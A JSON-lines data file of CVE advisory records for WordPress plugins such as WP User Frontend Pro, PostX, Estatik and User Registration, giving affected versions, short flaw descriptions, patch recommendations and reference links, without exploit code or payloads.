{"CVE_ID":"CVE-2025-3055","slug":"wp-user-frontend-pro","versionImpact":"4.1.3","versionEndExcluding":"4.1.4","description":"The WP User Frontend Pro plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the delete_avatar_ajax() function in all versions up to, and including, 4.1.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 4.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/headwayapp.co\\\/wp-user-frontend-changelog\",\"name\":\"https:\\\/\\\/headwayapp.co\\\/wp-user-frontend-changelog\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eeb71c31-9e56-4b58-9cfc-a97f6892cc2b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eeb71c31-9e56-4b58-9cfc-a97f6892cc2b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3054","slug":"wp-user-frontend-pro","versionImpact":"4.1.3","versionEndExcluding":"4.1.4","description":"The WP User Frontend Pro plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the upload_files() function in all versions up to, and including, 4.1.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. Please note that this requires the 'Private Message' module to be enabled and the Business version of the PRO software to be in use.","recommendation":"Update to version 4.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/headwayapp.co\\\/wp-user-frontend-changelog\",\"name\":\"https:\\\/\\\/headwayapp.co\\\/wp-user-frontend-changelog\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/989f0e0b-8a57-4435-95b0-21fec215112d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/989f0e0b-8a57-4435-95b0-21fec215112d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5326","slug":"ultimate-post","versionImpact":"4.1.2","versionEndExcluding":"4.1.3","description":"The Post Grid Gutenberg Blocks and WordPress Blog Plugin \u2013 PostX plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'postx_presets_callback' function in all versions up to, and including, 4.1.2. This makes it possible for authenticated attackers, with Contributor-level access and above, to change arbitrary options on affected sites. This can be used to enable new user registration and set the default role for new users to Administrator.","recommendation":"Update to version 4.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07a3db33-3787-4b63-835d-8e3026206842?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07a3db33-3787-4b63-835d-8e3026206842?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-post\\\/trunk\\\/classes\\\/Styles.php#L160\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-post\\\/trunk\\\/classes\\\/Styles.php#L160\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-post\\\/trunk\\\/classes\\\/Styles.php#L177\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-post\\\/trunk\\\/classes\\\/Styles.php#L177\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3093815\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3093815\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8671","slug":"woo-events","versionImpact":"4.1.2","versionEndExcluding":"4.1.3","description":"The WooEvents - Calendar and Event Booking plugin for WordPress is vulnerable to arbitrary file overwrite due to insufficient file path validation in the inc\/barcode.php file in all versions up to, and including, 4.1.2. This makes it possible for unauthenticated attackers to overwrite arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 4.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d7af96a-5a3c-4291-a369-f6ed78f72a3f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d7af96a-5a3c-4291-a369-f6ed78f72a3f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wooevents-calendar-and-event-booking\\\/15598178\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wooevents-calendar-and-event-booking\\\/15598178\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4643","slug":"enable-media-replace","versionEndExcluding":"4.1.3","description":"The Enable Media Replace WordPress plugin before 4.1.3 unserializes user input via the Remove Background feature, which could allow Author+ users to perform PHP Object Injection when a suitable gadget is present on the blog","recommendation":"Update to version 4.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d9125604-2236-435c-a67c-07951a1fc5b1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d9125604-2236-435c-a67c-07951a1fc5b1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2594","slug":"user-registration","versionImpact":"4.1.2","versionEndExcluding":"4.1.3","description":"The User Registration & Membership  WordPress plugin before 4.1.3 does not properly validate data in an AJAX action when the Membership Addon is enabled, allowing attackers to authenticate as any user, including administrators, by simply using the target account's user ID.","recommendation":"Update to version 4.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1c1be47a-d5c0-4ac1-b9fd-475b382a7d8f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1c1be47a-d5c0-4ac1-b9fd-475b382a7d8f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13729","slug":"podlove-podcasting-plugin-for-wordpress","versionImpact":"4.1.23","versionEndExcluding":"4.1.24","description":"The Podlove Podcast Publisher WordPress plugin before 4.1.24 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.1.24, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2feed26b-ef02-4954-ab9d-8b0f958b0ef1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2feed26b-ef02-4954-ab9d-8b0f958b0ef1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-24796","slug":"mage-eventpress","versionEndExcluding":"4.1.2","description":"Deserialization of Untrusted Data vulnerability in MagePeople Team Event Manager and Tickets Selling Plugin for WooCommerce \u2013 WpEvently \u2013 WordPress Plugin.This issue affects Event Manager and Tickets Selling Plugin for WooCommerce \u2013 WpEvently \u2013 WordPress Plugin: from n\/a through 4.1.1.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/mage-eventpress\\\/wordpress-wpevently-plugin-4-1-1-php-object-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/mage-eventpress\\\/wordpress-wpevently-plugin-4-1-1-php-object-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7499","slug":"betterdocs","versionImpact":"4.1.1","versionEndExcluding":"4.1.2","description":"The BetterDocs \u2013 Advanced AI-Driven Documentation, FAQ & Knowledge Base Tool for Elementor & Gutenberg with Encyclopedia, AI Support, Instant Answers plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_response function in all versions up to and including 4.1.1. This makes it possible for unauthenticated attackers to retrieve passwords for password-protected documents as well as the metadata of private and draft documents.","recommendation":"Update to version 4.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/betterdocs\\\/tags\\\/4.1.0\\\/includes\\\/REST\\\/DocCategories.php#L82\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/betterdocs\\\/tags\\\/4.1.0\\\/includes\\\/REST\\\/DocCategories.php#L82\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3338384\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3338384\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5231b741-4d02-45b5-b2aa-0d9d3536a416?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5231b741-4d02-45b5-b2aa-0d9d3536a416?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-25797","slug":"vslider","versionEndExcluding":"4.1.2","description":"Auth. Stored Cross-Site Scripting (XSS) vulnerability in Mr.Vibe vSlider Multi Image Slider for WordPress plugin <=\u00a04.1.2 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/vslider\\\/wordpress-vslider-multi-image-slider-for-wordpress-plugin-4-1-2-cross-site-scripting-xss?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/vslider\\\/wordpress-vslider-multi-image-slider-for-wordpress-plugin-4-1-2-cross-site-scripting-xss?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4206","slug":"groundhogg","versionImpact":"4.1.1.2","versionEndExcluding":"4.1.2","description":"The WordPress CRM, Email & Marketing Automation for WordPress | Award Winner \u2014 Groundhogg plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'process_export_delete' and 'process_import_delete' functions in all versions up to, and including, 4.1.1.2. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 4.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/trunk\\\/admin\\\/tools\\\/tools-page.php#L701\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/trunk\\\/admin\\\/tools\\\/tools-page.php#L701\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/trunk\\\/admin\\\/tools\\\/tools-page.php#L912\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/trunk\\\/admin\\\/tools\\\/tools-page.php#L912\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3289364\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3289364\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0256b4ad-6094-4062-bdf7-c3fc0410557b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0256b4ad-6094-4062-bdf7-c3fc0410557b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2563","slug":"user-registration","versionImpact":"4.1.1","versionEndExcluding":"4.1.2","description":"The User Registration & Membership  WordPress plugin before 4.1.2 does not prevent users to set their account role when the Membership Addon is enabled, leading to a privilege escalation issue and allowing unauthenticated users to gain admin privileges","recommendation":"Update to version 4.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2c0f62a1-9510-4f90-a297-17634e6c8b75\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2c0f62a1-9510-4f90-a297-17634e6c8b75\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11329","slug":"comfino-payment-gateway","versionImpact":"4.1.1","versionEndExcluding":"4.1.2","description":"The Comfino Payment Gateway plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 4.1.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 4.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/comfino-payment-gateway\\\/tags\\\/4.1.0\\\/views\\\/admin\\\/configuration.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/comfino-payment-gateway\\\/tags\\\/4.1.0\\\/views\\\/admin\\\/configuration.php#L39\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/006945a3-5f54-4bb8-9522-c832d59624a0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/006945a3-5f54-4bb8-9522-c832d59624a0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5223","slug":"ultimate-post","versionImpact":"4.1.1","versionEndExcluding":"4.1.2","description":"The Post Grid Gutenberg Blocks and WordPress Blog Plugin \u2013 PostX plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's file uploading feature in all versions up to, and including, 4.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7234d4b9-a575-428a-9d08-2dc62ba41c30?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7234d4b9-a575-428a-9d08-2dc62ba41c30?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-post\\\/tags\\\/4.0.4\\\/addons\\\/custom_font\\\/Custom_Font.php#L13\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-post\\\/tags\\\/4.0.4\\\/addons\\\/custom_font\\\/Custom_Font.php#L13\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3093051\\\/ultimate-post\\\/trunk\\\/addons\\\/custom_font\\\/Custom_Font.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3093051\\\/ultimate-post\\\/trunk\\\/addons\\\/custom_font\\\/Custom_Font.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8352","slug":"social-web-suite","versionImpact":"4.1.11","versionEndExcluding":"4.1.12","description":"The Social Web Suite \u2013 Social Media Auto Post, Social Media Auto Publish plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 4.1.11 via the download_log function. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 4.1.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78ba132c-b5b4-4999-a0ec-67d17ae2857f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78ba132c-b5b4-4999-a0ec-67d17ae2857f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-web-suite\\\/trunk\\\/includes\\\/libs\\\/class-socialwebsuite-log.php#L78\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-web-suite\\\/trunk\\\/includes\\\/libs\\\/class-socialwebsuite-log.php#L78\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3155593\\\/social-web-suite\\\/trunk?old=3068377&old_path=%2Fsocial-web-suite%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3155593\\\/social-web-suite\\\/trunk?old=3068377&old_path=%2Fsocial-web-suite%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13341","slug":"WooCommerce-Multi-Locations-Inventory-Management","versionImpact":"4.1.11","versionEndExcluding":"4.1.12","description":"The MultiLoca - WooCommerce Multi Locations Inventory Management plugin for WordPress is vulnerable to SQL Injection via the 'data-id' parameter in all versions up to, and including, 4.1.11 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 4.1.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-multi-locations-inventory-management\\\/28949586\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-multi-locations-inventory-management\\\/28949586\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8bb172cc-b7a6-401d-a246-1918702d654d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8bb172cc-b7a6-401d-a246-1918702d654d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4331","slug":"theplus_elementor_addon","versionEndExcluding":"4.1.10","description":"The Plus Addons for Elementor plugin for WordPress is vulnerable to privilege escalation in versions up to, and including 4.1.9 (pro) and 2.0.6 (free). The plugin adds a registration form to the Elementor page builders functionality. As part of the registration form, users can choose which role to set as the default for users upon registration. This field is not hidden for lower-level users so any user with access to the Elementor page builder, such as contributors, can set the default role to administrator. Since contributors can not publish posts, only author+ users can elevate privileges without interaction via a site administrator (to approve a post).","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96388c82-2392-42b3-b0a0-c3d92910fb5c\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96388c82-2392-42b3-b0a0-c3d92910fb5c\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2514618%40the-plus-addons-for-elementor-page-builder&new=2514618%40the-plus-addons-for-elementor-page-builder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2514618%40the-plus-addons-for-elementor-page-builder&new=2514618%40the-plus-addons-for-elementor-page-builder&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4332","slug":"theplus_elementor_addon","versionEndExcluding":"4.1.10","description":"The Plus Addons for Elementor plugin for WordPress is vulnerable to arbitrary file reads in versions up to, and including 4.1.9 (pro) and 2.0.6 (free). The plugin has a feature to add an \"Info Box\" to an Elementor created page. This Info Box can include an SVG image for the box. Unfortunately, the plugin used file_get_contents with no verification that the file being supplied was an SVG file, so any user with access to the Elementor page builder, such as contributors, could read arbitrary files on the WordPress installation.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2523506%40the-plus-addons-for-elementor-page-builder&new=2523506%40the-plus-addons-for-elementor-page-builder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2523506%40the-plus-addons-for-elementor-page-builder&new=2523506%40the-plus-addons-for-elementor-page-builder&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa698e7e-b1c7-4ead-aa2e-7fbfc9dfac80\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa698e7e-b1c7-4ead-aa2e-7fbfc9dfac80\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5003","slug":"ldap-login-for-intranet-sites","versionImpact":"4.1.9","versionEndExcluding":"4.1.10","description":"The Active Directory Integration \/ LDAP Integration WordPress plugin before 4.1.10 stores sensitive LDAP logs in a buffer file when an administrator wants to export said logs. Unfortunately, this log file is never removed, and remains accessible to any users knowing the URL to do so.","recommendation":"Update to version 4.1.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91f4e500-71f3-4ef6-9cc7-24a7c12a5748\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91f4e500-71f3-4ef6-9cc7-24a7c12a5748\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6050","slug":"estatik","versionImpact":"4.1.0","versionEndExcluding":"4.1.1","description":"The Estatik Real Estate Plugin WordPress plugin before 4.1.1 does not sanitise and escape various parameters and generated URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 4.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c08e0f24-bd61-4e83-a555-363568cf0e6e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c08e0f24-bd61-4e83-a555-363568cf0e6e\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6049","slug":"estatik","versionImpact":"4.1.0","versionEndExcluding":"4.1.1","description":"The Estatik Real Estate Plugin WordPress plugin before 4.1.1 unserializes user input via some of its cookies, which could allow unauthenticated users to perform PHP Object Injection when a suitable gadget chain is present on the blog","recommendation":"Update to version 4.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8cfd8c1f-2834-4a94-a3fa-c0cfbe78a8b7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8cfd8c1f-2834-4a94-a3fa-c0cfbe78a8b7\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6048","slug":"estatik","versionImpact":"4.1.0","versionEndExcluding":"4.1.1","description":"The Estatik Real Estate Plugin WordPress plugin before 4.1.1 does not prevent user with low privileges on the site, like subscribers, from setting any of the site's options to 1, which could be used to break sites and lead to DoS when certain options are reset","recommendation":"Update to version 4.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/74cb07fe-fc82-472f-8c52-859c176d9e51\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/74cb07fe-fc82-472f-8c52-859c176d9e51\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4667","slug":"feedzy-rss-feeds","versionEndExcluding":"4.1.1","description":"The RSS Aggregator by Feedzy WordPress plugin before 4.1.1 does not validate and escape some of its block options before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a388232b-a399-46a5-83e6-20c1b5df351d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a388232b-a399-46a5-83e6-20c1b5df351d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0812","slug":"ldap-login-for-intranet-sites","versionEndExcluding":"4.1.1","description":"The Active Directory Integration \/ LDAP Integration WordPress plugin before 4.1.1 does not have proper authorization or nonce values for some POST requests, leading to unauthenticated data disclosure.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0ed5e1b3-f2a3-4eb1-b8ae-d3a62f600107\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0ed5e1b3-f2a3-4eb1-b8ae-d3a62f600107\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4305","slug":"ultimate-post","versionImpact":"4.0.4","versionEndExcluding":"4.1.0","description":"The Post Grid Gutenberg Blocks and WordPress Blog Plugin  WordPress plugin before 4.1.0 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 4.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/635be98d-4c17-4e75-871f-9794d85a2eb1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/635be98d-4c17-4e75-871f-9794d85a2eb1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5429","slug":"logo-slider-wp","versionImpact":"4.0.0","versionEndExcluding":"4.1.0","description":"The Logo Slider  WordPress plugin before 4.1.0 does not validate and escape some of its Slider Settings before outputting them back in attributes, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 4.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ddb76c88-aeca-42df-830e-abffd29f1141\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ddb76c88-aeca-42df-830e-abffd29f1141\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1511","slug":"user-registration","versionImpact":"4.0.4","versionEndExcluding":"4.1.0","description":"The User Registration & Membership \u2013 Custom Registration Form, Login Form, and User Profile plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 's' parameter in all versions up to, and including, 4.0.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 4.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/tags\\\/4.0.2\\\/modules\\\/membership\\\/includes\\\/Admin\\\/Membership\\\/ListTable.php#L246\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/tags\\\/4.0.2\\\/modules\\\/membership\\\/includes\\\/Admin\\\/Membership\\\/ListTable.php#L246\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246826\\\/user-registration\\\/tags\\\/4.1.0\\\/modules\\\/membership\\\/includes\\\/Admin\\\/Membership\\\/ListTable.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246826\\\/user-registration\\\/tags\\\/4.1.0\\\/modules\\\/membership\\\/includes\\\/Admin\\\/Membership\\\/ListTable.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e0bee7c-8dce-421c-af16-7e5152797e6c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e0bee7c-8dce-421c-af16-7e5152797e6c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13879","slug":"stream","versionImpact":"4.0.2","versionEndExcluding":"4.1.0","description":"The Stream plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 4.0.2 due to insufficient validation on the webhook feature. This makes it possible for authenticated attackers, with administrator-level access and above, to make web requests to arbitrary locations originating from the web application which can be used to query and modify information from internal services.","recommendation":"Update to version 4.1.0, or a newer patched 